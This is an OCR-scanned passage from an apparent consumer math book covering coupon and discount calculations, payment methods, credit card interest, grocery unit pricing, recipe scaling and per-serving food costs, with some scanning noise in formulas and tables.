lesser value) for half price.” Is that a deal, or what? 


You develop the answer with a tried-and-true costing technique: 
List the factors, figure in the tax and tip, and add everything up. 
Figure 5-9 shows you how. 


Item Without Coupon| With Coupon 
Entry #1 $15.00 $15.00 
Entry #2 $15.00 $7.50 
Beverages $4.00 $4.00 
SUBTOTAL $34.00 $26.50 
Tax (7.75 percent) $2.64 $2.05 
SUBTOTAL $36.64 $28.55 


Tip (15 percent) $5.50 $4.28 
TOTAL $42.14 $32.83 


Illustration by Wiley, Composition Services Graphics 


Figure 5-9: Calculating savings on a “buy one, get one half off” deal. 
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Entrée #1 is $15.00 with or without the coupon, but with the 
coupon the price of Entrée #2 drops from $15.00 to $7.50. That’s a 
nice savings. Beverages aren’t part of the deal. 


In theory, you should tip on the undiscounted prices. In real 
life, the server takes his or her chances. On the other hand, you 
shouldn’t tip on taxes, but people do anyway. 


Doubling down on discounts 


Discounts are consistent reductions in the basic price of goods or 
services. That’s a bit different from coupons and sales. While 
coupons expire and a sale may last a day or a week, discounts tend 
to apply all the time. 


The merchant discounts prices in the hope of attracting customers 
who might not otherwise be able to buy (Seniors on a fixed 
income, for example). Also, the merchant may want to increase 
traffic during otherwise slow times (for example, matinee showings 
at movie houses and pre-dinner hours at coffee shops). 


The purpose of discounts is to attract and build business. For that 
reason, merchants can be infinitely resourceful about offering 
them. You can find an incentive discount for practically everyone. 
You see student discounts, employee discounts, military discounts, 
child discounts (think “Kids eat for free!”), and senior discounts. 
Other discounts are available if you’re a member of an organiza- 
tion. A prominent example is the American Association of Retired 
Persons (AARP), which offers members discounts on practically 
everything, including travel, entertainment, prescription drugs, and 
insurance. 


Your real-life math task is to calculate discounts and make good 
math-based judgments. 


Basic discount math 


Discounts can come in various forms. Some discounts are a 
percentage (“10 percent off to seniors”), and some are a lower 
price (“$2.00 off for seniors”). Some discounts are in effect for part 
of the day (“early bird” specials at the coffee shop, for example). 


Most discount math is incredibly simple. Just subtract the 
discount. For example, if a regular ticket price is $8.00 but seniors 
or students get $3.00 off, the cost of the ticket is $5.00. 
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No percentage calculations are required for this coffee shop 
special: “Two early bird dinners for $12.00.” What could be simpler 


than dividing by 2? 
i i = total price 
discounted price per meal = Dumber at aes 
discounted price per meal = $12.00 


discounted price per meal = $6.00 


To see your savings, just subtract the discounted price from the 
regular price. If a meal is normally $8.95, and you’re paying $6.00, 
you save $2.95. 


Determining the real discount in “double discounts” 


You'll love this. The ad says “Double discount! Everything in the 
store 25 percent off! And take another 25 percent off at the register!” 


You get a 50 percent discount, right? Wrong, wrong, wrong! It’s 
really a 44 percent discount. Look at this $10.00 item when double 
discounted: 


final price = regular price x 0.75 x 0.75 
final price = $10.00 x 0.75 x 0.75 

final price = $5.625 

final price = $5.63 rounded 


A discount of 25 percent means that you’re paying 75 percent of an 
item’s regular price. When you calculate the discount two times, 
the answer is not 50 percent. The second discount applies to the 
first discount amount. In the example, the first discount takes the 
purchase price from $10.00 down to $7.50. Then the second discount 
is applied, taking the final price to $5.63. That’s not the same thing 
as $5.00, the amount you probably expected to pay. 


How Do Vou Wanna Pay for That? 


When you shop, you can pay in several ways: cash, check, money 
order, on account, debit card, PayPal, and credit card. Each 
method has advantages and disadvantages. 


Paying with cash: This form of payment completes a 
transaction. There are no debit card entries or credit card 
statements to worry about. You rely on the merchant to stand 
behind the purchase. 
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Paying by check: Checks represent cash, but some merchants 
are reluctant to take them. They feel that they’ve been burned 
too many times by bad checks. 


Paying with a money order: Money orders are a useful way 
to pay some bills by mail. Because you buy them with cash, 
you have no debt worries. 


Buying on account: You can buy “on account” at some stores, 
a method often used by small businesses. You get a monthly 
statement and then write one check to the merchant for all 
purchases made during the month. 


Paying with a debit card: Also known as an ATM card, 
purchases with a debit card complete a transaction. As soon 
as you pay, the amount is almost instantly removed from your 
bank account. 


Paying with PayPal: PayPal is usually required for eBay 
purchases and is often an option with other online vendors. 
Paying with PayPal is a little like paying with a debit card, 
because PayPal immediately debits your checking account. 


Paying with a credit card: Credit cards are convenient and 
honored almost everywhere. The merchant is paid by the 
credit card issuing bank, and you pay the issuer when you 
get a monthly statement. Because it’s essentially a consumer 
loan, you decide how much and when to pay it off. Credit 
cards offer some protection if a merchant won’t make good on 
a defective product, because the bank that issues the credit 
card will usually reverse a charge if you have a dispute. 


Capturing bargains with credit cards 


Credit cards are one of the most convenient ways to pay. In fact, 
sometimes they are too convenient, because they can put you in 
serious debt (which I explain in Chapter 10). But they do offer a 
little-known advantage: The credit card is a great tool for capturing 
bargains. For example, if a giant big screen HDTV is on sale for 
$750.00 and it’s normally $1,500.00, maybe you should buy it now. 
Most likely, you will use a credit card to pay for it. 


Another advantage to paying by credit card is that you can choose 
how fast you want to pay down your credit card balance. But be 
careful, because that advantage can turn into a liability, and you 
may be paying off that HDTV forever. 
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A disadvantage is that you have to pay interest, typically at 18-21 
percent per year, if you don’t pay off your balance each month. 
Another disadvantage is that you may go overboard and buy more 
than you can realistically pay off. 


Follow these basic rules to use credit cards wisely: 


Ask yourself whether the purchase is worth it. If the item is 
essential (for example, school clothes for the kids), use the 
credit card. 


Ask yourself when the item will wear out. If the item is used 
up before it’s paid off, buying with a credit card is a bad idea. 
This is especially true of meals and admission to theme parks. 
If the purchase will last a while (like that great power saw at 
Home Paradise), it’s probably okay to charge it. 


Ask yourself whether paying by credit is more convenient. 
Paying with a credit card is far more convenient when you’re 
not sure exactly how much cash you’! need to make the 
purchase (an expensive meal out, for example). 


Ask yourself whether you can pay off the charge. 
Remember, that a little bit of every purchase contributes to 
your credit card balance, until the balance is zero (see 
Figure 5-10). The only way to avoid this “growing balance” is 
to pay off your balance each month. 


In this example, you’ve made five payments of $50.00. That’s 
$250.00. But if the interest rate is 18 percent per year, you’ve only 
lowered your balance by $191.93. Note that you charged both an 
HDTV and a dinner. The HDTV will last a long time, but that dinner 
lives only on your waistline. 


Starting Monthly| Ending 
New Charges Balance| Interest} Payment} Balance 
HDTV $750.00 
Dinner $100.00 $850.00 $12.75 $50.00} $812.75 


$812.75 $12.19 $50.00 $774.94 
$774.94 $11.62 $50.00] $736.56 
$736.56 $11.05 $50.00] $697.61 
$697.61 $10.46 $50.00) $658.07 
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Figure 5-10: A growing credit card balance. 
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You can use your math skills to build a payoff chart. Take the 
starting balance, add in interest (at the monthly rate of 1/12 the 
annual percentage rate), and subtract the payment. You will get an 
ending balance. 


For advice and strategies for avoiding or getting out of credit card 
trouble, head to Chapter 10. 


Taking advantage of layaway 


Layaway is a way to buy an item without paying for it all at one 
time but avoiding using credit. The merchant “lays away” the item 
for you in storage, and you don’t get it until you’ve completely paid 
for it. 


Here are the advantages of layaway: 


After you’ve paid for it completely, the item is yours, all 
yours. If you change your mind and don’t complete the 
transaction, the item goes back into stock and you get your 
money back (but you’re charged a small fee). 


The price is fixed, and you’re not charged interest (as you 
would be with a credit card). 


The availability of the item is guaranteed, because it has been 
laid away. 


Asa bonus, you may also gain a sense that you're living within 
your means. 


Layaway was a big deal during the Great Depression, and it has 
been making a comeback, especially during the last several 
Christmas shopping seasons. Why Christmas? Because that’s the 
season when many retailers make most of their money, and they 
want to encourage sales. 


Discovering Deals at the Grocery 


The supermarket is a super place to compare prices and discover 
deals. Why? The Food Marketing Institute reports that, as of 2010, 
the average grocery store has about 38,718 items. Giant stores 
have as many as 60,000 items! 


QO Part il: Math for Everyday Activities 


MBER 
we 
g 


g NBER 
h> 


In this section, I share the math you need to know to estimate your 
grocery bill, estimate how much you need to buy, and find the best 
deals. 


There are several simple estimates you can make. You may be 
making them already when you shop. The whole point is to find 
the greatest benefit with the least cost. 


Estimating the whole grocery bill 


You can estimate your entire grocery bill by keeping a running 
total in your head, on a piece of paper, or on a smartphone. To 
make the task simpler, just round up each item’s price. For example, 
if a can of vegetables is priced at $0.89, call it $1.00. When you 
reach the checkout, your estimate will be a little high, and so you 
won’t be surprised at the total. 


If it seems like too much effort to estimate the sum of all items, try 
doing it with only the most expensive items you buy. That estimate 
will give you a sense of how “big impact” items are affecting your 
grocery bill. 


In trying to determine your whole grocery bill, don’t forget to 
include taxes. For most stores, just add 10 percent. Take your 
estimated balance and move the decimal point one place to the 
left. For a purchase of $70.00, estimate paying about $7.00 in sales 
tax. Because some states don’t charge sales tax, other state and 
local sales taxes haven’t hit 10 percent (yet), and many don’t tax 
food items and medicine, your estimate will be high. Which means 
you'll get a pleasant surprise at the checkout. 


Estimating how much to buy 


Charity begins at home, and so does estimating. You benefit by 
knowing how much to buy before you turn yourself loose at the 
grocery store. For example, if you’d like to serve a standing rib 
roast at a big family meal, know your needs in advance: 

To feed 6 people, buy a 3-rib roast. 

To feed 8 people, buy a 4-rib roast. 

1# To feed 10 people, buy a 5-rib roast. 

To feed 12 people, buy a 6-rib roast. 

To feed 14 people, buy a 7-rib roast. 
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The math is simple. Begin by looking up recipes to determine what 
an average serving size is (the Internet is a good place to look), and 
then multiply the serving size by the number of guests. For a rib 
roast, for example, you'll want to allow 1 rib for every 2 guests. Be 
careful! The last time I looked, a full 7-rib roast cost about $104.00! 


Steamed clams are easier. There are generally 12 to 15 clams per 
pound. Serve 1-2 pounds of steamer clams per person (most of the 
weight is waste — the shell). If you’re serving 4 guests, you’d want 
4-8 pounds. 


Comparing unit prices 


Grocery deals are based almost entirely on price. Generally, the 
lowest price wins. When you’re comparing items, try to compare 
apples to apples. Shallots, for example, cost about six times what 
yellow onions do, so comparing shallots to yellow onions isn’t 
really fair. 


You calculate deals based on unit price. Sometimes, the store 
practically gives this information away; sometimes, you have to 
calculate to get it. 


Some grocery stores feature unit pricing on the shelf, not on the 
item. Figure 5-11 is an example of unit pricing label. 


01- 07/05/12 5-B-1 
VACAVILLE 115249 
CRHY KOSHER 

PKL DILL 


000-1241000-33555 6-46 OZ H 
O SPERO 
0052776 


0 
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Figure 5-11: A unit pricing label. 


Look carefully. The cost of a jar of pickles is $3.99, but the unit 
price is $0.065 per ounce. If you know the unit price, you can easily 
compare this product to other brands and other sized jars of 
pickles. 
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Comparing products per 
roll or square foot 


You can compare items such as aluminum foil, plastic wrap, paper 
towels, and toilet paper in several ways. Methods include per roll 
and per square foot. 


Comparing prices of the same brand of paper towels by package 
size is easy. You can practically do it in your head. Just divide the 
price by the number of rolls in the package. Figure 5-12 shows a 
comparison between a single roll of paper towels, selling for $2.59 
and a 3-roll package selling for $6.29. 


Comparing Number of Rolls Price| Price Per Roll 
Paper towels — 1 roll $2.59 
Paper towels — 3 rolls 
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Figure 5-12: Comparing one to many. 


In Figure 5-12, you can see that the unit price for 3 rolls is less than 
the unit price for 1 roll. 


For aluminum foil or plastic wrap (or anything sold by the square 
foot), you compare by square footage. The comparison is easy, 
because the number is right on the package. Figure 5-13 compares 
three rolls of aluminum foil. 


Comparing Square Footage Price 
Brand name — 50 SF $4.49 
Store brand — 50 SF $2.99 
Store brand —75 SF 
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Figure 5-13: Comparing by square foot. 


When you compare 50 square feet (SF) of the brand name foil with 
50 square feet of the store brand, you see a big difference in price. 
But wait! Who would have expected that the store had 75 square 
foot rolls on sale? That 75 SF roll costs less than the 50 SF roll. 
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Calculating volume (25 percent 
more free!) 


Liquid volumes are calculated in fluid ounces and in liters. 
Comparing for value can be incredibly simple. When quantities are 
the same (for example, 2-liter bottles of soft drinks), just compare 
the prices. The same is true when comparing six-packs of 12 ounce 
(355 mL) soft drinks. 


Comparing two items with different volumes gets a little tricky. But 
after a while you can do it in your head. The idea is to make the 
different volumes more or less equivalent to each other. For example, 
a six-pack of cola has 6 cans with a capacity of 355 mL. Think “2 
cans contain about 700 mL, so 6 cans contain about 2,100 mL.” 
Well, 2,100 mL is only a little more than the volume of a 2-liter 
bottle (2,000 mL). Say the six-pack sells for $2.99, while the 2-liter 
bottle of the same product sells for $1.99. Buy the big bottle. 


Determining Where to Shop 


Your money is important, not just to you, but to retailers. Every 
time you shop, you're essentially voting for something — fora 
product or a merchant. If you think about it, that makes you a very 
powerful person. A store may not know you as an individual, but as 
part of the buying public, you can help its prosperity or put it out 
of business. 


Narrowing your choices 


A key component is choosing where to shop. Each type of store 
can fill a need, so where you shop depends on your needs. You 
might go to a superstore to save money on groceries, but you 
might also go to a specialty grocery store to find Italian, Jewish, 
Mexican, Chinese, or Thai items you can’t get anywhere else. There 
are also specialty stores that sell only meat, fish, or cheese. 


Narrow your shopping choices down to three types: local store, 
big box stores, and online stores. Each type of store has advantages 
and disadvantages for you: 
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Local stores: These stores are close by. They are usually 
owned by people in your community. Some stores (think 
Kmart or Safeway) are “corporate” stores but employ people 
in your community. 


Big box stores: These stores may be near you, or they may 
require a bit of a drive. They are known for their giant size 
and very low prices. 


Online stores: Online stores have no “brick and mortar” store 
at all. They are highly convenient places to shop. However, 
you can’t hold the merchandise in your hands. A nice delivery 
service will bring your purchase to you, so you don’t have to 
drive a car (but you do have to pay for shipping). You don’t 
even have to dress up, for that matter. 


Looking at externalities 


These days, every consumer has to be an economist. It seems as 
though you need to know everything from the cost of the money 
that funds your mortgage to the value of the renminbi (the cur- 
rency of the People’s Republic of China). So you should know 
about externalities. 


An externality is a cost or benefit that isn’t transmitted by prices. A 
negative externality is a cost that the creator of a problem doesn’t 
bear. “Nobody” pays for it, except that we all pay for it. You could 
call it “playing for free.” For example, if a chemical company pollutes 
a river, “nobody” pays for it, except that the costs of cleanup come 
out of everyone’s taxes. If a local store closes, “nobody” except 

the store takes a loss, except that that community may have new, 
unexpected costs to bear. 


Rest assured that shopping can produce negative externalities. 
For example, if you drive a long way to a superstore, the air gets 
polluted and the roads wear out. Negative externalities are difficult, 
but not impossible, to compute, and they are reported in news- 
papers and online. As consumers become more aware of them, 
they demand changes. It’s mainly a matter of considering the over- 
all costs and benefits of your shopping choices. 


There are also positive externalities, too. For example, when a new 
store opens, the store hires employees. The employees buy homes 
and pay taxes that help the schools. 
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The impact of your shopping choices 


Where you spend your money determines the success or failure of businesses. You 
can have a big impact on business, which is only fair, because some businesses 
can have a big impact on you. 


The study of economic and social impacts is a broad field. You just need to know 
the basic principles. By knowing the principles, you can use your math skills to geta 
sense of the impact your decisions about where to shop have. If the concept can be 
boiled down to one general principle, it would be that everything affects everything. 
Your shopping choices matter! 


Gauging the impacts of 
different store types 


Each store type has both direct and indirect impacts on a community. 
Consider what happens when a big box store opens and local 
merchants go out of business. To put it simply, an indirect impact 
is when your neighbor loses his or her job. A direct impact is when 
you lose your job. 


Impact of the big box store 


The biggest impact of a big box store is that it may cause local 
business to fail. For example, if a local supermarket closes, you can 
calculate the cost of this closure by using simple multiplication. Just 
multiply the average salary by the number of employees out of a 
job. For example, if the average salary is $20,000.00 and the local 
store had 93 employees, your community has lost $1,860,000.00. 


93 x $20,000.00 = $1,860,000.00 


In other words, the economic impact of the store closing is a loss 
of about $1.9 million. 


The social impact can be far-reaching, too, especially if the laid-off 
employees can’t easily get new jobs. That situation may stress the 
Temporary Assistance for Needy Families program (sometimes 

called welfare) and the resources of the churches and food banks. 
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When a local store stays open, there’s also a “multiplier effect.” 
Store employees spend their paychecks at other local stores and 
make donations to local charities. 


The prices at big box stores are very low, but if they require a 
drive to get there, you create a bigger carbon footprint than if you 
had shopped locally. And, bluntly, some big box stores have a 
reputation for paying low wages and not offering healthcare 
benefits. 


Impact of online shopping 


Shopping online may or may not produce lower prices. Sometimes, 
the base price “giveth,” but shipping costs “taketh away.” Figure 5-14 
shows a price comparison between buying a TV online and buying 
one at a local store. The math is a simple cost comparison. Find 
the items that make up the total cost of acquisition, and add 
everything up. 


Item Local Online 
Television $200.00 $180.00 
Delivery $0.00 $24.00 
Tax (8 percent) $16.00 $0.00 


Total cost $216.00 $204.00 
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Figure 5-14: Comparing online and local shopping. 


In this example, you avoid paying sales tax (although this is 
changing), but you pay for shipping. In the end, you save only a 
few dollars. When the government requires all online vendors to 
charge sales tax, you may end up paying more for an online 
purchase than a local purchase. 


Online shopping reduces your carbon footprint. It also reduces 
the volume of business for local merchants. You also give up the 
opportunity to handle the merchandise. 


Online purchases require you to use a credit card, debit card, 

or PayPal to make the purchase. If you feel uncomfortable using 
these payment methods online, you probably won’t be able to buy 
online. 


Be careful of online purchases where the item costs $5.00 but the 
shipping cost is $10.00. This really happens! 


Chapter 6 


Mmm, Mmm, Good: 
Kitchen Calculations 


In This Chapter 
Converting measurements when you’re cooking 
Making recipes bigger and smaller 
Figuring whether buying food in quantity is a good deal 


J- kitchen’s a great place to hone your math skills. After all, 
yov’re doing math already, whether you know it or not. Having 
a few math tools and simple techniques at your disposal makes 
cooking better and easier, and the results of your math work will 
taste great! 


In this chapter, I tell you how to convert from one measurement 
unit to another (a very common dilemma in kitchens every- 
where), how to scale a recipe up or down so that you make just 
the number of servings you need, and how to apply math to some 
everyday cooking and purchasing tasks. 


Taking Measure 


Measuring ingredients correctly makes you a better cook (well, at 
least, a more accurate cook). To measure ingredients accurately, 
you need to understand the most common measurement units in 
the kitchen, and you need to know a bit about equivalencies — 
both of which are covered in the following sections. 


Knowing your units 


In the kitchen, you measure (and sometimes convert) volume and 
weight. In order to perform that task, you need to understand sys- 
tems of measurement and units of measure. 
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The United States uses the U. S. customary system of measurement 
(sometimes called the American system). Some of the units are 
very common in the home, especially in the kitchen, and are often 
referred to collectively as the household system. 


The American units you will likely encounter in the kitchen are 


1” Mass: Mass (weight) is measured in ounces (oz) and pounds (Ib). 


Liquid volume: Liquid volume is measured in fluid ounces (fl 
oz), pints (pt), quarts (qt), and gallons (gal). Other common 
units include teaspoons (tsp), tablespoons (tbsp), and cups (C). 


In the past, the imperial system (also known as the British Imperial) 
was the rule for countries in the British Empire. The system has 
(among other things) a larger gallon than the American system. 
Since 1995, the United Kingdom has used the metric system. So 
does every country in the world, except for the United States, 
Burma (Myanmar), and Liberia. 


The metric units you will likely encounter in the kitchen are 


1# Mass: Mass (weight) is measured in grams (g) and kilograms (kg). 


Liquid volume: Liquid volume is measured in milliliters (mL), 
deciliters (dL), and liters (L). 


Length: Length is measured in millimeters (mm) and 
centimeters (cm). 


You use a couple other measurements every day in the kitchen, 
but they don’t come up on any formal list of units: 


Temperature, measured in degrees Fahrenheit or Celsius 


Time, measured in seconds, minutes, and hours 


“Per each” units or fractions of units, such as butter (that is, 
1 stick) and fruit or vegetables (that is, 1/2 lemon, 2 medium 
onions, 2 eggs, and so on) 


Temperature and time are pretty much things you just set (but 
don’t forget), but you may find yourself needing to change “per 
each” units according to your needs. 
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Equivalencies — All things 
being equal 


Which is more, 4 fluid ounces of milk or 1/2 cup of milk? Neither. 
They’re both the same quantity. And that’s what an equivalent 
is. How many teaspoons are in a tablespoon? That’s another 
equivalent. The answer is 3. 


Knowing things like how many pints are in a quart or how many 
teaspoons are in a tablespoon comes in mighty handy in the 
kitchen, especially when you're scaling recipes (the topic of the 
next section) or when you don’t have the appropriate tool to 
measure in the unit the recipe specifies (say the recipe calls for 
fluid ounces but you need to know what it is in cups). 


The solution? Memorize the equivalencies you use most or trust 
a handy-dandy source, like Table 6-1, which lists common 
equivalencies that practically do the work for you. 


Table 6-1 Common Equivalencies 

Name American Equivalent Metric Equivalent 

1 teaspoon 5 milliliters 

1 tablespoon 3 teaspoons 15 milliliters 

1 cup 8 fluid ounces 240 milliliters 

1 pint 2 cups, 16 fluid ounces 480 milliliters 

1 quart 2 pints, 4 cups, 32 fluid 960 milliliters, 0.96 liters 
ounces 

1 gallon 4 quarts, 8 pints, 16 cups, 3.785 liters 
144 fluid ounces 

1 deciliter 3.38 fluid ounces 100 milliliters 

1 liter 33.8 fluid ounces 1,000 milliliters 

1 ounce 28.35 grams 

1 pound 16 ounces 454 grams 

1inch 25.4 millimeters, 


2.54 centimeters 


10 inches (cucum- 
ber, for example) 


25.4 centimeters 
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ai? Most kitchens have the basic tools (measuring spoons and 
measuring cups) that make kitchen math possible. If you do a lot 
of cooking (and hence a lot of kitchen math), two great options are 
a digital scale and a digital timer. Neither is absolutely necessary, 
but both can help you. Without them, you may end up doing “time 
math” and “weight math” the whole time you’re cooking. 


The digital timer counts down to show how much cooking 
time’s left for a dish, which is much more convenient than 
looking at the clock, adding cooking time to determine the 
time when a dish will be done, and then having to watch 
that clock. The timer can also count up to show how long 
something has been cooking. 


The digital scale is an inexpensive, easy, precise way of 
measuring ingredients by weight in both American and metric 
units. It sure beats guesstimating, which nobody does very 
well. To me, 3 ounces, 4 ounces, and 5 ounces of an ingredient 
all look about the same. 


Scaling a Recipe 


Typical recipes are great if you are an average household, but 
most families aren’t average. Many people, young and old, live 
alone, and many couples delay having children for a while. Young 
children eat like, er, children, but older children eat more like 
adults. Also, a recipe for a family won’t work when friends (or all 
the relatives) are coming over. That means that most recipes need 
some adjustment. 


So what do you do when a recipe says it will yield four or six 
servings, but you want to feed more or fewer people? You change 
the recipe to produce the number of servings you want. This is 
called scaling a recipe. To increase the number of servings, you 
scale up a recipe. To decrease the number of servings, you scale 
down a recipe. 


The keys to scaling a recipe 


You can scale up or down in either of two ways: by percentage or 
by ratio-proportion. Here’s a quick rundown of how to use each 
method: 
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Scaling by percentage: Find the percentage increase or 
decrease between the number of portions given and the 
number of portions you want, and apply the percentage to 
each ingredient. This method is fast, especially when the 
percentage increase or decrease is a nice round number. 


Scaling by ratio-proportion: Use the ratio of the number of 
portions given to the number of portions you want and apply 
it to the ratio of the given amount of each ingredient to the 
amount you need. This method shows you the clearest 
picture of the relationship between old and new amounts. 


Scaling in action 


To see how scaling works, consider a simple spaghetti meal that 
serves 4. It has only 3 major ingredients: 


16 ounces uncooked spaghetti 
24 ounces spaghetti sauce, made from crushed tomatoes 


6 ounces Parmesan cheese 


You'll want to add garlic, thyme, oregano, basil, marjoram, bay 
leaf, salt, and pepper as well, but the amounts of these ingredients 
are based on your personal preference. 


Now say that you’re having 12 people over on Saturday night. Since 
the recipe makes 4 servings, you need to multiply the ingredients 
by 3 to get the 12 serving you need (4 servings x 3 = 12 servings). 


Or maybe only you and another person are eating, so you want 

2 servings instead of 4, especially if you hate leftovers. How much 
of the ingredients do you need now? In this case, the solution — 
halving the recipe or dividing all the ingredients by 2 — may be 
apparent. With a simple recipe like this one, you see that mental 
math produces fast answers. (See Chapter 4 for more calculations 
you can do in your head.) 


But suppose that the solutions don’t just pop into your head or 
that the recipe is much more complex, with many more ingredients 
needed in much more precise quantities. That’s when the two 
scaling methods can come in handy. I use a simple recipe in the 
following examples, but the math works with complicated recipes, 
too. After a while, you’ll be able to do the math in your head and 
just write down the revised quantities on the recipe. 
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Scaling up and down by percentage 
To scale up by percentage, do the following. 


1. Calculate the percentage you need to increase each 
ingredient. 
Use this calculation: 


desired servings 


recipe servings x100 


percentage = 


percentage = 1? x100 


percentage = 3.00 x 100 
percentage = 300 percent 


2. Multiply each ingredient by the percentage. 


In this example, the percentage is 300 percent, so you 
multiply each ingredient by 3.00: 


Spaghetti = 16 oz x 3.00 = 48 oz 
Sauce = 24 oz x 3.00 = 72 oz 
Parmesan = 6 oz x 3.00 = 18 oz 


Now you know that you need 48 ounces of spaghetti, 72 ounces of 
spaghetti sauce, and 18 ounces of Parmesan cheese. 


To scale down by percentage, do the following. 


1. Calculate the percentage you need to decrease each 
ingredient. 
Use this calculation: 


desired servings 
recipe servings 


percentage = x 100 


percentage = 2 x100 


percentage = 0.50 x100 
percentage = 50 percent 


2. Multiply each ingredient by the percentage. 
In this example, you multiply by 50 percent, or 0.50: 
Spaghetti = 16 oz x 0.50 = 8 oz 
Sauce = 24 oz x 0.50 = 12 oz 


Parmesan = 6 oz x 0.50 = 3 oz 
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So to feed 2 rather than 4 people, you need 8 ounces of 
spaghetti, 12 ounces of spaghetti sauce, and 3 ounces of cheese. 


Scaling up or down by ratio-proportion 
To scale up by ratio-proportion, follow these steps: 


1. Set up a ratio-proportion. 


In this example, you are scaling up from 4 servings to 12 
servings. 


known servings _ known ingredient amount 
desired servings desired ingredient amount 


4 _ 16 oz (spaghetti) 
12” x oz (spaghetti) 


2. Cross-multiply and solve. 


4x =192 
x= 48 oz 


The answer is 48 oz. 
3. Perform the same calculation for the other ingredients in 
the recipe. 


To scale down by ratio-proportion, follow these steps: 


1. Set up a ratio-proportion. 


In this example, you are scaling down from 4 servings to 2 
servings. 


known servings _ known ingredient amount 
desired servings desired ingredient amount 
4 _ 16 oz (spaghetti) 
2” x oz (spaghetti) 


2. Cross-multiply and solve. 
4x = 32 
x=8 0z 
The answer is 8 oz. 


3. Do the same calculation for the other ingredients in the 
recipe. 


104, Part it: Math for Everyday Activities 


ai? If you like to cook (as I do), you can add to the fun by knowing the 
history of the dishes you make. For example, the first Italian 
cookbook with a recipe for tomato sauce was Lo Scalo alla Moderna, 
published in 1692. 


Using Math to Buy 
and Cook Smart 


Use some smart kitchen math to figure out per-serving costs 
exactly. You may find that a meal you thought to be costly isn’t 
really expensive at all. 


You can also use math to get more value from food (that is, save 
money) when you look at the advantages of buying food in bulk. 


Calculating per-serving costs 


The process for calculating per-serving costs of a meal is simple: 
1. Add up the costs of all the ingredients that make up a 
dish to give you the total cost of the dish. 
2. Divide the total cost of the dish by the number of servings. 


3. Repeat Steps 1 and 2 to figure the costs of each of the 
other dishes in the meal. 


4. Add up the per-serving cost of each dish to get the 
per-serving cost for the meal. 


Here’s an example: Suppose that you want to calculate the per-meal 
cost of a low-cost, three-item spaghetti dinner that serves 4 (refer 
to the earlier section “Scaling in action”). For this example, I’ve 
added a loaf of pre-buttered garlic bread. Also, the spaghetti is the 
cheapest in the store, the sauce is pre-made, and the Parmesan 
cheese is pre-grated in the lowest-priced container sold. The price 
of each of the ingredients is as follows: 


16 ounces of uncooked spaghetti, $1.00 
24 ounces of spaghetti sauce, $2.50 


6 ounces of Parmesan cheese, $2.00 
1 loaf of garlic bread, $3.00 
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With the prices at hand, follow these steps: 


1. Add the cost of the spaghetti ingredients. 


total cost = ingredient 1+ ingredient 2 + ingredient 3 
total cost = $1.00 + $2.50 + $2.00 
total cost = $5.50 


2. Divide the total cost ($5.50) by the number of servings. 


ingredient cost 
number of servings 


$5.50 
4 


per-serving cost = 


per-serving cost = 


per-serving cost = $1.375 
The answer is about $1.38 per serving. 


3. Divide the cost of the garlic bread ($3.00) by the number 
of servings. 


ingredient cost 
number of servings 


$3.00 
4 


per-serving cost = 


per-serving cost = 


per-serving cost = $0.75 


The answer is $0.75 per serving. 


4. Add the cost of the items (spaghetti and garlic bread). 


per-serving cost (whole meal) = item 1+ item 2 
per-serving cost (whole meal) = $1.38 + $0.75 
per-serving cost (whole meal) = $2.13 


The answer is about $2.13 per serving. 


Restaurants always calculate per-serving costs, and you can find 
online calculators that can help you. A good one is http: //www. 
free-online-calculator-use.com/restaurant-food- 
cost-calculator.html. Also, want some ideas for inexpensive 
meals? Run an Internet search for “Meals for under $20.” You’ll get 
lots of hits. For that matter, plenty of sites list meals under $10.00. 
Many of these meals are one-pot meals, but you can find other 
types, too. 
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Taste by the ton: Buying in bulk 


If you like or use some foods a lot, you may be able to save money 
by buying in bulk. Although buying in bulk can often save you a 
bundle, bulk prices aren’t always a sure way to savings. The trick 
is in knowing when the bulk item is a better deal. 


Fortunately, the math for comparing bulk versus non-bulk prices is 
easy. You simply calculate the per-ounce or per-pound cost of each 
product and then compare the answers. With this method, you can 
figure cost savings right at home, once you know a few prices. (To 
figure cost savings while you’re shopping, jump to Chapter 5.) 


You used to be able to find bulk food only in health food stores, 
but now you can find bulk bins in all major supermarkets, including 
giant national retailers. You can also find bulk bargains in specialty 
markets, such as grocery outlets and restaurant supply stores. 

The bulk bins are great for buying grains, pastas, rice, nuts, and 
cereals. If you’re fortunate enough to live in or near a Latino or 
Hispanic community, you'll find big savings in big bags of beans 
and rice at the local mercado. The same reasoning applies to Indian 
or Pakistani items in England, or North African items in France. 


Say you want to compare the price of a little can of kidney beans 
to a big one. The little can weighs 15.25 ounces and sells for $1.19. 
The big can weighs 108 ounces and sells for $4.69. Follow these 
steps to determine which is the better deal: 


1. Determine the per-ounce price of the little can. 


price 
weight (oz) 
$1.19 
15.25 


per-ounce price = $0.078 


per-ounce price = 


per-ounce price = 


Each ounce of kidney beans from the little can costs about 
$0.08. 


2. Determine the per-ounce price of the big can. 
price 
weight (oz) 


$4.69 
108 


per-ounce price = $0.0434 


per-ounce price = 


per-ounce price = 


Each ounce of kidney beans from the big can costs a little 
over $0.04. 
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When is less more? 


Math isn't subjective, but food is. Quality and the perception of quality can improve 
your satisfaction and a/so save you money. For example, if you want to serve your 
friends a nice steak dinner, you may first think that the best option is to serve big, 
fat 12-ounce top sirloin steaks. Well, think again. 


Even bargain sirloin can cost $6.00 per pound. A 12-ounce steak is three-quarters 
(3/4) of a pound (a pound has 16 ounces; refer to Table 6-1). Using a calculator 
(or doing some mental math), you can determine that each steak costs $4.50. Filet 
mignon is $16.00 per pound. A 4-ounce filet is one-fourth (1/4) of a pound. Therefore, 
each 4 ounce steak costs $4.00. So you save money by serving filet mignon instead 
of top sirloin, because you pay $4.00 per steak instead of $4.50! 


It’s obvious that the savings is derived from reducing the tonnage of the steak, 
which is a good thing, because 3 ounces is currently the recommended, healthy 
portion size for steak. Therefore, serving a 4-ounce portion is generous. Plus filet 
mignon tastes better, has the reputation of being more “high class” than top sirloin, 
and will impress your friends. 


3. Compare the two prices. 


Compare 4 cents per ounce for the big can with 8 cents per 
ounce for the little can. The big can is a much better deal, 
because the per-ounce price is only half as much. 


You can calculate dry products, such as white rice and beans, 

the same way. For example, if a 1-pound bag of white rice sells for 
$1.69 and a 20-pound bag of white rice sells for $11.98, the math is 
the same. The 1-pound bag costs about $0.10 per ounce, and the 
20-pound bag costs about $0.04 per ounce. If you want to compare 
pounds (which is a little faster), the 1-pound bag costs $1.69 per 
pound, and the 20-pound bag costs about $0.60 per pound. 
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Chapter 7 


It Does a Body Good: Math for 
Health and Well-Being 


In This Chapter 
Calculating whether you’re getting the nutrients you need 
